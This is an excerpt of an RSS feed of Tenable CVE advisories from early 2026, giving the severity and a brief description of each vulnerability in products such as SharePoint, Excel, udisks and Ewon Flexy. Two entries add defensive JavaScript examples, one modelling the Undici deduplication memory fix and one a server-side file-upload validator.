            <guid>https://www.tenable.com/cve/CVE-2026-26123</guid>
            <pubDate>Tue, 10 Mar 2026 20:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A weakness in Microsoft Authenticator allows an unauthorized attacker to disclose information locally. The vendor's entry carries no CWE classification; the original feed text, "Cwe is not in rca categories", is a placeholder for that missing mapping.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26123">https://www.tenable.com/cve/CVE-2026-26123</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26121]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26121</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26121</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:41 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Server-side request forgery (SSRF) in Azure IoT Explorer allows an unauthorized attacker to perform spoofing over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26121">https://www.tenable.com/cve/CVE-2026-26121</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26118]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26118</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26118</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:41 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Server-side request forgery (SSRF) in Azure MCP Server allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26118">https://www.tenable.com/cve/CVE-2026-26118</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26117]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26117</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26117</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:41 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Authentication bypass using an alternate path or channel in Azure Windows Virtual Machine Agent allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26117">https://www.tenable.com/cve/CVE-2026-26117</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26116]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26116</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26116</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:40 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper neutralization of special elements used in an SQL command ('SQL injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26116">https://www.tenable.com/cve/CVE-2026-26116</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26115]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26115</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26115</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:40 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper validation of specified type of input in SQL Server allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26115">https://www.tenable.com/cve/CVE-2026-26115</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26114]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26114</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26114</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:40 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26114">https://www.tenable.com/cve/CVE-2026-26114</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26113]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26113</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26113</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:40 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Untrusted pointer dereference in Microsoft Office allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26113">https://www.tenable.com/cve/CVE-2026-26113</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26112]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26112</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26112</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26112">https://www.tenable.com/cve/CVE-2026-26112</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26111]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26111</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26111</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26111">https://www.tenable.com/cve/CVE-2026-26111</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26110]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26110</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26110</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26110">https://www.tenable.com/cve/CVE-2026-26110</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26109]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26109</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26109</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26109">https://www.tenable.com/cve/CVE-2026-26109</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26108]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26108</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26108</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26108">https://www.tenable.com/cve/CVE-2026-26108</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26107]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26107</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26107</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:38 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26107">https://www.tenable.com/cve/CVE-2026-26107</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26106]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26106</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26106</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:38 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper input validation in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26106">https://www.tenable.com/cve/CVE-2026-26106</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26105]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26105</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26105</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:38 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26105">https://www.tenable.com/cve/CVE-2026-26105</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26104]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26104</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26104</guid>
            <pubDate>Wed, 25 Feb 2026 11:16:03 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A flaw was found in the udisks storage management daemon that allows unprivileged users to back up LUKS encryption headers without authorization. The issue occurs because a privileged D-Bus method responsible for exporting encryption metadata does not perform a policy check. As a result, sensitive cryptographic metadata can be read and written to attacker-controlled locations. This weakens the confidentiality guarantees of encrypted storage volumes.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26104">https://www.tenable.com/cve/CVE-2026-26104</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26103]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26103</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26103</guid>
            <pubDate>Wed, 25 Feb 2026 11:16:02 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A flaw was found in the udisks storage management daemon that exposes a privileged D-Bus API for restoring LUKS encryption headers without proper authorization checks. The issue allows a local unprivileged user to instruct the root-owned udisks daemon to overwrite encryption metadata on block devices. This can permanently invalidate encryption keys and render encrypted volumes inaccessible. Successful exploitation results in a denial-of-service condition through irreversible data loss.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26103">https://www.tenable.com/cve/CVE-2026-26103</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25823]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25823</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25823</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:27 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have a stack buffer overflow that leads to a Denial of Service, which can also be exploited to achieve Unauthenticated Remote Code Execution.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25823">https://www.tenable.com/cve/CVE-2026-25823</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25819]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25819</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25819</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:27 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 allows unauthenticated attackers to cause a Denial of Service by using a specially crafted HTTP request that leads to a reboot of the device, provided they have access to the device's GUI.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25819">https://www.tenable.com/cve/CVE-2026-25819</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25818]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25818</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25818</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:27 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have weak entropy for authentication cookies, allowing an attacker with a stolen session cookie to find the user password by brute-forcing an encryption parameter.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25818">https://www.tenable.com/cve/CVE-2026-25818</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25817]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25817</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25817</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:25 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have improper neutralization of special elements used in an OS command allowing remote code execution by attackers with low privilege access on the gateway, provided the attacker has credentials.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25817">https://www.tenable.com/cve/CVE-2026-25817</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2581]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2581</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2581</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>This is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS). In vulnerable Undici versions, when interceptors.deduplicate() is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination. Impacted users are applications that use Undici’s deduplication interceptor against endpoints that may produce large or long-lived response bodies.</p>

      <h3>Patches</h3>
      <p>The issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started. Users should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.</p>
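      <p>The two deduplication shapes the advisory contrasts, as an added example that is not Undici's code: a constructed in-memory "upstream" yields a fixed number of body chunks, the vulnerable shape collects the whole body before fanning it out, and the patched shape forwards each chunk as it arrives and refuses handlers that try to join once streaming has started. The generator is synchronous to keep the accounting simple; the class and function names are this example's own.</p>

```javascript
// Added example, not Undici's code. Models why full-body accumulation in a
// request-deduplication layer turns a large upstream response into a memory
// amplifier, and how streaming chunks to every waiter bounds what is held.
// `upstream` is a constructed stand-in for the network response.
function* upstream(chunkCount, chunkSize) {
  for (let i = 0; i < chunkCount; i++) yield Buffer.alloc(chunkSize, 0x41);
}

// A downstream handler that only counts what it received.
function countingHandler() {
  const h = { received: 0, completed: false };
  h.onData = (chunk) => { h.received += chunk.length; };
  h.onComplete = () => { h.completed = true; };
  return h;
}

// Vulnerable shape: the body is collected in full and handed to every waiting
// handler at the end. Peak retained bytes grow with the response size, so an
// upstream answering with a huge or never-ending chunked body drives the
// process toward OOM. Returns the peak bytes held by the deduplicator.
function dedupeAccumulate(handlers, chunkCount, chunkSize) {
  const parts = [];
  let held = 0;
  let peak = 0;
  for (const chunk of upstream(chunkCount, chunkSize)) {
    parts.push(chunk);
    held += chunk.length;
    peak = Math.max(peak, held);
  }
  const body = Buffer.concat(parts);
  for (const h of handlers) { h.onData(body); h.onComplete(); }
  return peak;
}

// Patched shape: each chunk is forwarded to all joined handlers as it arrives
// and then dropped, so the deduplicator never holds more than one chunk. A
// handler that tries to join after the first chunk has gone out is refused,
// since it could not be given the bytes it missed; it must send its own request.
class StreamingDedupe {
  constructor() { this.handlers = []; this.started = false; this.peak = 0; }
  join(handler) {
    if (this.started) return false;
    this.handlers.push(handler);
    return true;
  }
  run(chunkCount, chunkSize) {
    for (const chunk of upstream(chunkCount, chunkSize)) {
      this.started = true;
      this.peak = Math.max(this.peak, chunk.length);
      for (const h of this.handlers) h.onData(chunk);
    }
    for (const h of this.handlers) h.onComplete();
    return this.peak;
  }
}

// Runs both shapes with three identical concurrent requests, plus a fourth
// that arrives while the streamed body is already flowing.
function compare(chunkCount, chunkSize) {
  const a = [countingHandler(), countingHandler(), countingHandler()];
  const accumulatePeak = dedupeAccumulate(a, chunkCount, chunkSize);

  const s = [countingHandler(), countingHandler(), countingHandler()];
  const d = new StreamingDedupe();
  for (const h of s) d.join(h);
  const late = countingHandler();
  let lateJoinAccepted = null;
  // Trigger the late join from inside the first forwarded chunk.
  const probe = s[0].onData;
  s[0].onData = (chunk) => {
    probe(chunk);
    if (lateJoinAccepted === null) lateJoinAccepted = d.join(late);
  };
  const streamPeak = d.run(chunkCount, chunkSize);

  return {
    accumulatePeak,
    streamPeak,
    lateJoinAccepted,
    accumulateReceived: a.map((h) => h.received),
    streamReceived: s.map((h) => h.received),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  // 256 chunks of 16 KiB: the accumulator peaks at 4 MiB, the streamer at 16 KiB.
  console.log(compare(256, 16384));
}
```

      <p>Every handler still receives the full body in both shapes; the difference is only in what the deduplicator itself retains, which is what an untrusted upstream can inflate. The late-join refusal is the second half of the fix: once bytes have been forwarded, a new identical request cannot be folded into the in-flight one without either replaying a prefix (which would mean buffering again) or handing the newcomer a truncated body.</p>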

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2581">https://www.tenable.com/cve/CVE-2026-2581</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25737]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25737</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25737</guid>
            <pubDate>Mon, 09 Mar 2026 21:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.24.0 and earlier, an arbitrary file upload vulnerability exists even though file extension restrictions are configured. The restriction is enforced only at the UI level. An attacker can bypass these restrictions and upload malicious files.</p>
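      <p>A server-side upload check of the kind the advisory says was missing, as an added example that is not Budibase's code: the allow-list, the signatures and the sample files are constructed for the example. Because the restriction in the vulnerable versions lived only in the UI, any HTTP client could submit a disallowed file; the check below runs on the bytes the server actually received, matching both the extension and the file's leading magic bytes so a script renamed to <code>photo.png</code> is rejected as well.</p>

```javascript
// Added example, not Budibase's code. Server-side validation that does not
// depend on anything the browser did: extension allow-list plus magic-byte
// check. The allow-list and signatures here are this example's assumptions.
const ALLOWED = {
  png:  [[0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]],
  jpg:  [[0xff, 0xd8, 0xff]],
  jpeg: [[0xff, 0xd8, 0xff]],
  gif:  [[0x47, 0x49, 0x46, 0x38, 0x37, 0x61], [0x47, 0x49, 0x46, 0x38, 0x39, 0x61]],
  pdf:  [[0x25, 0x50, 0x44, 0x46, 0x2d]],
};

// Extension of the basename, lower-cased; null when there is none. Path
// components are dropped so "../x/shell.php" is judged on "shell.php".
function extensionOf(filename) {
  const base = String(filename).split(/[\\/]/).pop();
  const idx = base.lastIndexOf('.');
  if (idx <= 0 || idx === base.length - 1) return null;
  return base.slice(idx + 1).toLowerCase();
}

function startsWith(bytes, sig) {
  if (bytes.length < sig.length) return false;
  for (let i = 0; i < sig.length; i++) {
    if (bytes[i] !== sig[i]) return false;
  }
  return true;
}

// Returns { ok: true, ext } or { ok: false, reason }. `bytes` is the uploaded
// content as a Buffer or Uint8Array; the name alone is never trusted.
function validateUpload(filename, bytes) {
  const ext = extensionOf(filename);
  if (ext === null) return { ok: false, reason: 'missing extension' };
  if (!Object.prototype.hasOwnProperty.call(ALLOWED, ext)) {
    return { ok: false, reason: 'extension .' + ext + ' not allowed' };
  }
  // "shell.php.png" reaches this point as .png, so the content must be a PNG.
  if (!ALLOWED[ext].some((sig) => startsWith(bytes, sig))) {
    return { ok: false, reason: 'content does not match .' + ext };
  }
  return { ok: true, ext };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed inputs: a real PNG header and a PHP stub.
  const png = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 0x0d]);
  const php = Buffer.from('<?php echo 1; ?>');
  console.log(validateUpload('shell.php', php));   // rejected: extension
  console.log(validateUpload('photo.png', php));   // rejected: content
  console.log(validateUpload('photo.png', png));   // accepted
}
```

      <p>The magic-byte check is what makes the extension list meaningful: an attacker who controls the file name also controls the extension, so the only signal the server owns is the content. Serving uploads from a separate origin with a fixed <code>Content-Type</code> and <code>Content-Disposition: attachment</code> is the usual second layer, since even a genuine PNG can carry a polyglot payload.</p>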

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25737">https://www.tenable.com/cve/CVE-2026-25737</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25689]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25689</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25689</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.2.0, FortiDeceptor 6.0 all versions, FortiDeceptor 5.3 all versions, FortiDeceptor 5.2 all versions, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions, FortiDeceptor 4.3 all versions, FortiDeceptor 4.2 all versions, FortiDeceptor 4.1 all versions, FortiDeceptor 4.0 all versions may allow a privileged attacker with super-admin profile and CLI access to delete sensitive files via crafted HTTP requests.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25689">https://www.tenable.com/cve/CVE-2026-25689</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25572]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25572</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25572</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK server component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25572">https://www.tenable.com/cve/CVE-2026-25572</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25571]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25571</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25571</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK client component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25571">https://www.tenable.com/cve/CVE-2026-25571</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25570]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25570</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25570</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK does not perform checks on input values potentially resulting in stack overflow. This could allow an attacker to perform code execution and denial of service.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25570">https://www.tenable.com/cve/CVE-2026-25570</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25569]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25569</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25569</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). An out-of-bounds write vulnerability exists in SICAM SIAPP SDK. This could allow an attacker to write data beyond the intended buffer, potentially leading to denial of service, or arbitrary code execution.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25569">https://www.tenable.com/cve/CVE-2026-25569</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25190]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25190</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25190</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Untrusted search path in Windows GDI allows an unauthorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25190">https://www.tenable.com/cve/CVE-2026-25190</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25189]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25189</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25189</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25189">https://www.tenable.com/cve/CVE-2026-25189</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25188]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25188</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25188</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to elevate privileges over an adjacent network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25188">https://www.tenable.com/cve/CVE-2026-25188</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25187]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25187</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25187</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper link resolution before file access ('link following') in Winlogon allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25187">https://www.tenable.com/cve/CVE-2026-25187</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25186]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25186</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25186</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Exposure of sensitive information to an unauthorized actor in Windows Accessibility Infrastructure (ATBroker.exe) allows an authorized attacker to disclose information locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25186">https://www.tenable.com/cve/CVE-2026-25186</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25185]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25185</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25185</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Exposure of sensitive information to an unauthorized actor in Windows Shell Link Processing allows an unauthorized attacker to perform spoofing over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25185">https://www.tenable.com/cve/CVE-2026-25185</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25181]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25181</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25181</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Windows GDI+ allows an unauthorized attacker to disclose information over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25181">https://www.tenable.com/cve/CVE-2026-25181</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25180]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25180</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25180</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Microsoft Graphics Component allows an unauthorized attacker to disclose information locally.</p>

